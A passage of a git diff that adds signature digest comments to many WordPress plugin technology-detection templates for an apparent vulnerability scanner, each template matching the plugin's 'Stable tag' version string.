490a0046304402200a6a3f4ccaf2cc3e30429b74d89ccfed6ffcd270dc55a383a1433b545d593bdf02204c2cb690be937a3431dbae9ebe2f48776f8ba73dd6039adb0434089d66d3c497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..fe52171212 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f3409672acbe0a412c59655bd8b37bb508e65c489f63213b605a7141a2726cc02200179894ebddb9cc4d330adc8491017f4fa8db88a4e001a5c9f1756e213c8e7a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..53c6599a08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b7c04299f8f31ee48bd0ae276edfc7c7748eb77d64fcfd4ef689fccd958806bd022100d2a6c92b53dd6ff80cb59a6d414d6518507f13665c51931bc238321bcae0b45d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..160bf0e0b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a11c1d89b43c485c9abdeec4b39cab9e63dca4ed38c196f6c5f663993e87d0a3022049e5f120ea12ea2db890ed34c67c68cf7b050367993b4bdedcdb5c2ce5e5bd93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..250922582d 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009384031e28ea03ec895f19bee5d0b381f314ad1658faac0bdd0f9ac7bf58c6fb02202a6b7f7c023039e049946b07956ea4f95bc32997e504573f32d7f88ff8f835f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..7f007a1030 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202978f58920f4880cf2fa996c714076b6c0595f01118d35aa8d8b34074940afb102202946f9b0da0a0c4158c072fc39a35edd431708fa620bffae69ad01462a7a9c04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..9b156487ef 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d812ce1f0487545586c941d0e4592d2700c0123cf3a23addf687b3bfeff31c660221008d327540b8eeb92702e3f6836d5a9812a33146e0d241d88cc0fb3634dedcefc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..1dcc8e48c5 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202501b2fddc389968974121792af4046c8605290860fd017423b3169579647536022100cf02be0522decb823e13f3c13d1ee07f24e0bfa0659c4e0819e32ccd238b56df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..b560c4e7b9 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022c9b775f8a9e250430689756ad70c2aae466bc9dc0cab3ff7a31e7398d97679022008f90d6166bb6806aabe0eaf0aaecff8400e311b76799d15e4edde1d7ea0fa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..04c7972209 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f58faba75ab8abd1676ffe3ca5d3bf478085ae07d7f5c74d1467fcaff0debecb02200b516a279c8d2181452098cbe8f2595f95844cd1685e03def086d3c181854dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..b7a684c21f 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e5f0c54ddb734aa4c8f80f475f86186efd0c78a5790d1052ba4ac63000fe908102200de88979120b8ac2f1d9cd78ec5d7bf47bad59d9fb2c4a14eb5ef869f607b830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..14f56a98b1 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082c68fb6cd8a58b791f19fc2a5cdb275cfc60c22018b3535669cdc8b01972af802200aa068b3c2044e0c7199058b2c94e41236a3ea819c7dfc0beeafd23febcec64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..c09ec7c792 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0134ca28b0218cb84ca7222b27a17431b12b84af082bc3936241bb117a54cbb022100be4b0a89e81715a5788a1502f60395d374382b521a4831405bb6d411db524c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..75be82b58e 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc2312e03d181f14d508f3be562c6718f54ddfcbe69eaae9b9763c3244fe28b4022100aa53edbba4bbe6f5fe81cacf89c7442d1e280d057212fd1f5ac8bdb5c43f7412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..3ed71c8ca7 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ead156695e52fccc8360f645aab415051888334f6bfea8864d82ae471606b6b0221008056e4035c6655d6f020c281f2b794658fde070a9e8d3a2b8c4d730ebfbb7765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..7cbaf56861 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010e6d4b7e39a3d73ef8d9c33cf025ac166993d7949e35f177da924145c4a92e6022037087786a58d742b4835f5b527868e6bf515758ba17d22795e5ce7eb584ec0e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..bd1bc5edfb 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e5113415a46a4f7542c8514a528327925de06a18e5bcc6bfab75ecdb46afe0a02203a7388ae6c728a6c82daf0fcc037490c49e05bf048875ebc2c5149287dacd943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..37b5c4f41f 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100de894689ecf7e0adeda0fc58c6e577c433d9bce77f19dd64787f1be3a53e6fde022100d7c348f7a686bd681a9bca6fcef4427c2172b92159789c1419684f14bffb4cdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..d08327c188 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b80f7f1087cfb435a2f870fcbb8ff567ebc20bfe55f0e262de212b3822661e2d02210081e4f1a5aea4cbbbf87e6ed15595e0f1daadce930b7990d4a9d2745791cd16da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..c0418b3655 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee69b9d7aa0c92c5c0aac6c2e9162960d719df928a5ae1428f4650ef6d22b398022074c3cb53a9af8513c52d93351943b62ded5db2363fe2de10105c43e038bc53cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..e9ae126518 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f951a5d6b65877732ed44b32b3262f8b4082305a22504e34878de4392eca57e0220168b359c2b02c22920c547f9848d0333c2d95412a9f52d5f64e0e6d7daefe9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..0eaa56a1ac 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e22760e7f6b8822fc506b5cd3b7665571c959f083d678d62f6112ec236c851d90220630e107646612566e025e86cf402cad80e6d9db79e6780defd30b64ea5f475c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..e945815cf8 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8f628ec8837168a49cdf4ce991d16a7008875fa37a196d3ef508d216bafba4102201e51d53fa368f092b8d0dbb6231e2f1fc067785335b46dcdbce2a4473f325aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..8e8ac252ae 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0d7cc56c15ad5a74a3d2d2a80245a66560af761a42050369413798bfd0c296a02200a9bd878bc5c1344b00d47a432625545a1c28eb2f52b8802b915f1493f2fef2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..ab56f99510 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210095efa1675eee8fd1fd96fef05622003988f5e7aec4f7ec74a519c3ab3d930f87022033ff302fd5e3ff94b5b708ac72e3d3776bd52081556cc4437c04aeb71941c907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..73ba0f9c4f 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d0c8f9c29478fd09b9dd3011f9192cc810df7cc16e07c6fcde29c6a038c8008022100fea2ce34df7e7261b0861a7164a803ff60b45a1c51167de39d56de5a8ebec2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..acc03c08be 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ae4c4aa9d796b701c494e2a7d5310ab666a043af75b7cc8bb66edba0586d3c40220364bf67f6f01ba471e9e32fd9095b5f2e1405cdf86a96ab3f4970b2a1f33c1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..67937c8784 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eba13737add0c30a997e253848e051ab2f306d102e33313125a0a010a963e76802205bc797ba74da602cd30ccc83b131a295e18eeddb7364788e73492f4e9521b3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..aeb20bde85 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fd8dd395e7bb66de95d2334617d0544615ab827de56642cc6892b01e14048e002204c8e3aaf9811b3c20d10084c83186dcf4ee4048aa7aa60e022b558c7762570f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..0efc7f9ee4 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220160b6682b377826ca9ece7efd66f2c07e4fab505efa4c0372ce72cb538bfe38c02210087f84f41c308c9e07f49a126759dafd2c8910570a03e63eab7b8d3eb5a42dad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..f26808b877 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220629dd18dc0290b7176d411ef8a5b8ebaeb3765d43da1b4ee99937e4423cf98b2022042c17ff3fcd7ad4e6d8f422a4f60cb0626b444500ff122b158c630cbe2451c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..7909a5e0df 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e205b10c25ba20a886c6c704f10e42f5ad7c23f5b5d74104c216200b234ecdb702201e591579a40d1cbc3a936a53c3a1c64925492bc88cda47375fdd0a54eedbd173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..16f083d789 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c21d9195f3ad39f5aec5d2c2610aff9274aeb2f9c9bff1e035098040e79c1c8022077489cdeae7b3dd6b40c8e815a1a17c2a6aeff6ad27e28cc5806dbec797f200c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..76dead254b 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022044dac88fe8b80ed7d2ae2ac9a84da4169a9b611982e49a84c5502f9468658757022100b5c654dbe3d5922d2915fd41948afb7ae1ad43d3f143e4e47c5da74e9916032e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..6c73af7a60 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031d324be011a7de89e3c26b34226756b4811c117364ceedab0861d101ae72b1702210082d4cc08df0452b4ace88a486523a14e8d903dd618486f50ac5a3c372283ccb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..14f757a2ae 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f9d09a93b42a78cb5802ba2fc120294ce3b4ef1911c3bef49cf6cdcde58c7e2702205d5fea417c49d40989a6919b79c69abf677e5d8168885aa74ebd41d2703a8514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..9be873adb7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009dfd956d212d56716d13cf578beb288167065e867a56f419ba4a9630453247ea0221009c052e87976ae43db86c1b7bd93ca37116cce99227462996a646890006a64c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..b17e3ae236 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220256391f556aebc34a1462b08e8b2019d267d020adbb82377bbbca8c5299fd99c022100c55e0239ac11c2bea00412d0cd6198cdf7780094f02333927c422f9161c7c94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..e62e4e750e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f225217beb13967f579bf5da7dd206abb4f911c683bb3feea0fdcf3cdea7a84102206123db63cb494b13612897f502a988abb43e5e0a62762e4f99b3e16497319d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..706d6152f5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203648f66a2615854f9a0c4299552c724113291f08f1f4a57017140fabae24e78d022100a388eecaaa492e4f347ec07a2dff2af83919e46faf963dc6d4b25c5390a89bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..ae8bbd2e02 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050a5e9e7afdec74b1d5cc20a2ed09ef8f05bd3f6c334104e5ba9415603b63e4102210089dfd40edd99ff69a10c4b053296e9fbc13b583d996a916e57d0c500166ac3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..7848baa3a1 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f97f8d38ed7382c40f0a4bcc85fb16a77c77c8360c74c6acfc3ad4f92b857ae022100820329ec091e07eb875c65c73b4b07fea34b3899a277908ef0f54114eeb0e3ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..b8e77b7bd0 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220021e208c0eb5dbab9016129accbb9ed923c31fbf3bca164e013be20bc0f8fb400221009f11421c0bc96a64f4cfe261e854dfb83a010dfc5aca58a4781f6d16d7ea20ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..93d3ccfc6a 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bba9f2e8f5e07fee54cfecc083a898fad591accde778b6b77834057b1542b540022100c82b8313dfba378c4a6e8e070a5a8ad79625b0b03cf49a046263086bd4d1d6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..30c72b20ef 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0bd1ec9f5da6646862b8a07e47d25b509aae45764d4c35a00d3a683ece5df09022029a109ff40ec3c5229ddb6cbf7089cd7ddff6072bafeb49f01d738390d0303c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..c5944d5fb2 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e42d0f7a55be4f10f2fefe1e25a8be3ce7abd718bb16945e109ee0d02b11607022100a5d1e310cf104ffe91ed89136700288af9ddcfdaa9308589327927f68773d0c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..d2e2c05c95 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009708af4325dbe31693ec27cf3c3e0055849dcf078aed72b26a8b96dc0defb517022100fcb7ab1113aea431bb695f6ee9d07daa8ff2a18b704a2b9b07228887c64ab571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..8f2678fdf2 100644 --- 